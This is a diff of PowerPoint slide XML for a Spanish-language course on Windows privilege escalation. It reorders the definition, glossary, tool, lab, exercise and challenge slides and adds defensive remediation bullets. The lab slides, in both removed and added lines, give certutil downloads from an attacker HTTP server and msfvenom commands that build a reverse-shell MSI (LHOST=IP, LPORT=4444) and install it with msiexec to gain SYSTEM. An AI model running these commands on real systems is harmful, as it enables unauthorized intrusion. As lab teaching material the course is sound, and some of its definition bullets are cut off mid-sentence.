-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4354,97 +4700,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Entorno de laboratorio: una VM Windows 10/11 o Windows Server propia, deliberadamente configurada con al menos un servicio vulnerable, para practicar sin riesgo legal.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  WinPEAS (winPEASx64.exe/winPEASx86.exe): transferir vía certutil -urlcache -f http://IP:8000/winPEASx64.exe wp.exe desde un servidor HTTP en la máquina atacante.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  PowerUp.ps1 (parte de PowerSploit): script PowerShell de auditoría de privilegios; se ejecuta con . .\PowerUp.ps1; Invoke-AllChecks.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  accesschk.exe (Sysinternals): para verificar permisos efectivos sobre servicios y binarios.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  PrintSpoofer / GodPotato: binarios de prueba de concepto para abuso de SeImpersonatePrivilege, usados únicamente contra la VM de laboratorio propia.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Seatbelt: herramienta de enumeración en C# de la suite Ghostpack, útil como alternativa o complemento a WinPEAS para checks más específicos de dominio.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  msfvenom: generador de payloads de Metasploit Framework, usado para crear los binarios/MSI de prueba en el laboratorio.</a:t>
+              <a:t>•  WinPEAS: script de enumeración de la suite PEASS-ng para Windows, análogo a LinPEAS. Característica clave: colorea hallazgos por probabilidad de explotación, priorizando el trabajo del pentester.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enfoque defensivo: correr WinPEAS de forma controlada en tu propio parque de máquinas permite a seguridad identificar y remediar hallazgos antes de que un atacante los encuentre.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Unquoted service path: ruta de ejecutable de un servicio que contiene espacios y no está entre comillas. Característica clave: Windows intenta ejecutar cada segmento de la ruta hasta el primer…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enfoque defensivo: forzar el uso de comillas en todas las rutas de servicio (auditable con GPO o scripts de compliance) elimina este vector de raíz.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Servicio con permisos débiles: un servicio cuyo binario, carpeta contenedora o clave de registro son modificables por un usuario no privilegiado. Característica clave: sustituir el binario y…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enfoque defensivo: aplicar ACLs estrictas (solo administradores con escritura) sobre binarios y carpetas de servicios es una revisión de hardening de bajo costo y alto impacto.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  AlwaysInstallElevated: par de claves de registro (HKCU y HKLM) que, si ambas están activas, permiten a cualquier usuario instalar paquetes .msi con privilegios de SYSTEM. Característica clave…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4495,7 +4841,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4533,97 +4879,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Verifica el contexto actual: whoami, whoami /priv, whoami /groups, systeminfo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Transfiere y ejecuta WinPEAS: certutil -urlcache -f http://IPATACANTE:8000/winPEASx64.exe wp.exe y luego .\wp.exe &gt; peas.txt.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Busca servicios con ruta sin comillas: wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Verifica permisos sobre el servicio candidato con accesschk: accesschk.exe -uwcqv usuario NombreDelServicio.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Si el resultado muestra SERVICEALLACCESS o similar para tu usuario, reemplaza el binario o crea el ejecutable en la ruta intermedia con un payload generado con msfvenom -p windows/x64/shellreversetcp ....</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Revisa AlwaysInstallElevated: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated y la misma consulta contra HKLM.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Si ambas claves están en 1, genera un MSI malicioso con msfvenom -p windows/x64/shellreversetcp LHOST=IP LPORT=4444 -f msi -o payload.msi e instálalo con msiexec /quiet /qn /i payload.msi.</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SYSTEM — Cuenta de máximo privilegio en Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Administrador local — Nivel intermedio; puente hacia SYSTEM</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  WinPEAS / PowerUp — Herramientas de enumeración de escalada en Windows</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  PowerSploit — Conjunto de módulos ofensivos en PowerShell</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Unquoted service path — Ruta de servicio con espacios sin comillas; explotable</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  DLL hijacking — Cargar una DLL maliciosa desde una ubicación escribible</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4674,7 +5020,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4712,82 +5058,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Ejecuta WinPEAS y clasifica los tres hallazgos con mayor probabilidad de escalada.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Configura intencionalmente un servicio con ruta sin comillas y demuestra su explotación.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Usa PowerUp para detectar el mismo servicio y compara la salida con WinPEAS.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Verifica y explota (en laboratorio) una configuración AlwaysInstallElevated activa.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Investiga y documenta conceptualmente cómo PrintSpoofer abusa de SeImpersonatePrivilege, sin necesidad de ejecutar el exploit en un sistema de producción.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Escribe una lista de comandos de hardening (GPO o PowerShell) para cerrar cada vector estudiado.</a:t>
+              <a:t>•  Entorno de laboratorio: una VM Windows 10/11 o Windows Server propia, deliberadamente configurada con al menos un servicio vulnerable, para practicar sin riesgo legal.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  WinPEAS (winPEASx64.exe/winPEASx86.exe): transferir vía certutil -urlcache -f http://IP:8000/winPEASx64.exe wp.exe desde un servidor HTTP en la máquina atacante.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  PowerUp.ps1 (parte de PowerSploit): script PowerShell de auditoría de privilegios; se ejecuta con . .\PowerUp.ps1; Invoke-AllChecks.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  accesschk.exe (Sysinternals): para verificar permisos efectivos sobre servicios y binarios.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  PrintSpoofer / GodPotato: binarios de prueba de concepto para abuso de SeImpersonatePrivilege, usados únicamente contra la VM de laboratorio propia.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Seatbelt: herramienta de enumeración en C# de la suite Ghostpack, útil como alternativa o complemento a WinPEAS para checks más específicos de dominio.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  msfvenom: generador de payloads de Metasploit Framework, usado para crear los binarios/MSI de prueba en el laboratorio.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4838,7 +5199,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4876,22 +5237,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Reto: en tu VM Windows de laboratorio (con al menos dos vectores configurados: un servicio con permisos débiles y AlwaysInstallElevated activo), obtén privilegios de SYSTEM o administrador local por dos caminos distintos.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: el alumno entrega evidencia de whoami mostrando nt authority\system (o cuenta administradora) para cada uno de los dos métodos, con el comando exacto de explotación y la remediación correspondiente documentada.</a:t>
+              <a:t>•  Verifica el contexto actual: whoami, whoami /priv, whoami /groups, systeminfo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Transfiere y ejecuta WinPEAS: certutil -urlcache -f http://IPATACANTE:8000/winPEASx64.exe wp.exe y luego .\wp.exe &gt; peas.txt.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Busca servicios con ruta sin comillas: wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Verifica permisos sobre el servicio candidato con accesschk: accesschk.exe -uwcqv usuario NombreDelServicio.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Si el resultado muestra SERVICEALLACCESS o similar para tu usuario, reemplaza el binario o crea el ejecutable en la ruta intermedia con un payload generado con msfvenom -p windows/x64/shellreversetcp…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Revisa AlwaysInstallElevated: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated y la misma consulta contra HKLM.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Si ambas claves están en 1, genera un MSI malicioso con msfvenom -p windows/x64/shellreversetcp LHOST=IP LPORT=4444 -f msi -o payload.msi e instálalo con msiexec /quiet /qn /i payload.msi.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
